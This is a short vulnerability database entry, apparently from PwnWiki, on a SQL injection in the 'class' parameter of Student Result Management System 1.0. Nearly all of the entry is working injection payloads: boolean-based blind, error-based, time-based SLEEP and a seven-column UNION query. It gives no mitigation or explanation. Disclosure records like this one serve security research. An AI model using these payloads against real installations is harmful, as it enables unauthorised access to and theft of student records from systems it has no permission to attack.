
Student Result Management System 1.0 – 'class' SQL Injection Vulnerability

A free, open vulnerability database that anyone can edit


Affected versions

1.0

EXP

    Parameter: class (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: class=-6346' OR 3657=3657#&rn=1

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: class=1' OR (SELECT 3201 FROM(SELECT COUNT(*),CONCAT(0x71786a7171,(SELECT (ELT(3201=3201,1))),0x71766b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- hNXT&rn=1

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: class=1' AND (SELECT 1049 FROM (SELECT(SLEEP(5)))gIdB)-- yYYR&rn=1

    Type: UNION query
    Title: MySQL UNION query (random number) - 7 columns
    Payload: class=1' UNION ALL SELECT 8674,8674,8674,CONCAT(0x71786a7171,0x45414967666b57777145704f476d6566766d6f694d707561566e6150744d73505370466e7a6c784c,0x71766b7a71),8674,8674,8674#&rn=1

A free, open vulnerability database that anyone can edit -- PwnWiki.com